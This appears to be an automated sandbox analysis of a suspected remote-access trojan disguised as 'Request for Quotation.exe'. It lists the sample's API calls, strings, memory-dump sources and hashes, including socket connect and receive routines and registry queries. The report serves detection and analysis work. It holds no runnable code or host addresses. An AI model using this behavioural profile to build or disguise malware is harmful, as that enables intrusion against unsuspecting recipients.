                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                                                                  • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                                                                  • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                                                                  • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                                                                  • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                                                                  • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Disconnected!,?), ref: 0040D20B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040D21F
                                                                                • CreateThread.KERNEL32(00000000,00000000,00411A24,00000000,00000000,00000000), ref: 0040D240
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D249
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D252
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040D27E
                                                                                • atoi.MSVCRT ref: 0040D285
                                                                                • Sleep.KERNEL32(00000000), ref: 0040D293
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • String ID: %I64u$2.7.2 Pro$C:\Users\user\Desktop\Request for Quotation.exe$Connected to $Connecting to $Disconnected!$[INFO]$gYX$name
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00412407: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,00017838,0041BCB0,00000000), ref: 00412492
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00017838,0041BCB0,00000000), ref: 0040C83F
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000029), ref: 0040C855
                                                                                • atoi.MSVCRT ref: 0040C85C
                                                                                • Sleep.KERNEL32(00000000), ref: 0040C870
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416954,?), ref: 0040C884
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C898
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B50,?), ref: 0040C8CE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C8E5
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connecting to ,00000000,00000000,00415B50,00000000), ref: 0040C933
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040C943
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C950
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C961
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C975
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C981
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C99B
                                                                                • #52.WS2_32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9A2
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9D7
                                                                                • atoi.MSVCRT ref: 0040C9DE
                                                                                • #9.WS2_32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9E6
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000002,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA10
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA18
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA21
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA3E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connected to ,00000000,00000000,00415B50,00000000), ref: 0040CA92
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040CAA2
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CAAC
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CABD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CAD1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CADD
                                                                                • sprintf.MSVCRT ref: 0040CB14
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B954), ref: 0040CB25
                                                                                • _itoa.MSVCRT ref: 0040CB37
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040CB50
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040CB5D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040CB66
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,?,00000104,00000000), ref: 0040CB83
                                                                                  • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                                                                  • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                                                                  • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 0040CBA5
                                                                                  • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                                                                  • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                                                                  • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                                                                  • Part of subcall function 00409E7D: GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro), ref: 00409E8E
                                                                                  • Part of subcall function 00409E7D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041BA5C,?), ref: 0040CBCC
                                                                                • GetTickCount.KERNEL32 ref: 0040CC20
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE37
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE47
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040CE57
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE67
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE77
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE87
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE97
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEA7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CEB7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEC7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CED7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEE7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEF7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF07
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF17
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF27
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF37
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF47
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF51
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004B), ref: 0040CF68
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF74
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF80
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF8C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF98
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFA4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFB0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFBC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFC8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFD4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFE0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFEC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFF8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D004
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D010
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D01C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D028
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D034
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D040
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D04C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D058
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D064
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D070
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D07C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D088
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D094
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0A0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0B8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0C4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0D0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0DC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0E8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0F4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D100
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D10C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D118
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D124
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D130
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D13C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D148
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D154
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D160
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D16C
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D178
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D184
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D190
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D19C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1A8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1B4
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                                                                  • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                                                                  • Part of subcall function 00402149: #16.WS2_32(0041BE70,00000000,00000000,00000000,0041BE70,0041B310), ref: 00402186
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,00000000,00000000,00000000,0041BE70,0041B310), ref: 0040219A
                                                                                  • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                                                                  • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                                                                  • Part of subcall function 00402149: ??3@YAXPAX@Z.MSVCRT(00000000,0041BE70,00000000,00000000,00000000,0041BE70,0041B310), ref: 004021DB
                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Disconnected!,?), ref: 0040D20B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040D21F
                                                                                • CreateThread.KERNEL32(00000000,00000000,00411A24,00000000,00000000,00000000), ref: 0040D240
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D249
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D252
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040D27E
                                                                                • atoi.MSVCRT ref: 0040D285
                                                                                • Sleep.KERNEL32(00000000), ref: 0040D293
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@V01@@$G@2@@std@@G@std@@$V10@$V01@$??4?$basic_string@$atoi$?length@?$basic_string@SleepV10@@$??3@?size@?$basic_string@CloseCountCreateG@1@@InfoLocaleOpenQueryThreadTickValueY?$basic_string@_itoamallocsprintf
                                                                                • String ID: %I64u$2.7.2 Pro$Connected to $Connecting to $Disconnected!$[INFO]$name
                                                                                • API String ID: 2846451457-2447509818
                                                                                • Opcode ID: 2451c82b7e56797327475265fa73bfe04b2c7fe1325af9a44618baad30109576
                                                                                • Instruction ID: 574894a8069dd40dccd63d7f1e28fe1214fcfdb2903245f54546a53b35e7f031
                                                                                • Opcode Fuzzy Hash: 2451c82b7e56797327475265fa73bfe04b2c7fe1325af9a44618baad30109576
                                                                                • Instruction Fuzzy Hash: 615244B2C0021DEBCB15BBA1EC49EDE777CEB54305F1081AAF416A3151EB745B89CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                                                                  • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                                                                  • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                                                                  • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                                                                  • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                                                                  • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                                                                  • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
